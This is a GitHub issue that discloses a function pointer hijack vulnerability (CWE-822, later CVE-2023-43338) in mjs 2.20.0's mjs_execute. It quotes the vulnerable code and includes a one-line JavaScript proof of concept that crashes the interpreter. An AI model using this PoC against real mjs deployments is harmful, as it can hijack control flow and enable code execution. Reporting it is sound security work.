Function Pointer Hijack mjs/mjs.c in mjs_execute

Question

Function Pointer Hijack mjs/mjs.c in mjs_execute

cla7aye15I4nd opened this issue a year ago · 1 comments

cla7aye15I4nd commented a year ago

Function Pointer Hijack mjs/mjs.c in mjs_execute

Affected Projects

mjs 2.20.0 (https://github.com/cesanta/mjs)

Problem Type

CWE-822 (Untrusted Pointer Dereference)

Description

I discovered a vulnerability that could potentially lead to function pointer hijacking. I believe this is a logical vulnerability since it does not trigger any out-of-bounds (OOB) or use-after-free (UAF) assertions when compiled with AddressSanitizer. An attacker can exploit this vulnerability by providing a specially crafted input to the affected program, leading to the execution of arbitrary code.

The function hijack happend in mjs.c:8824

call_stack_push_frame(mjs, bp.start_idx + i, retval_stack_idx);

/* Perform the cfunction call */
((void (*) (struct mjs *)) mjs_get_ptr(mjs, *func))(mjs);

call_stack_restore_frame(mjs);

PoC:

print-=2;print("A");

Log:

$ clang -g -O2 -o mjs mjs.c -DMJS_MAIN
$ ./mjs poc.js 
Illegal instruction

Answer 1 · 2023-09-23T01:23:59.000Z

Assigned CVE-2023-43338